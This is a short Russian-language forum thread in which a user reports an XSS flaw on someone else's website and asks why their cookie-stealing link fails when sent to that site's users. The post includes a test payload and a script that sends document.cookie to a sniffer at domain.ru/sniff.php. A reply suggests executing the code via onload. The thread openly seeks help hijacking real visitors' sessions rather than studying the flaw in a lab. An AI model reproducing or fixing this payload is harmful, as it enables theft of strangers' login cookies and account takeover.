Нужна помощь по XSS

skynett

Newbie
11.04.2021
1
0
Здравствуйте уважаемые форумчане нужна ваша помощь ) Была обнаружена XSS уязвимость на одном из сайтов при вводе
Код:
<script>alert(document.cookie)</script>
сайт показывает мне мои куки и с этого я сделал вывод что сайт уязвим. На одном форуме дали код сниффера он отлично работает проверил на одном из своих сайтов.Но дело в том что когда я даю пользователю данного сайта уязвимою ссылку типа
Код:
<script>img = new Image();img.src="http://domain.ru/sniff.php?cookie="+document.cookie;</script>
и он по ней проходит куки не отправляются что можно сделать ?
 
У тебя изображение отображается из пути http://domain.ru/sniff.php?cookie="+document.cookie
А должен код выполниться при загрузке изображения.
Пробуй через onload
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab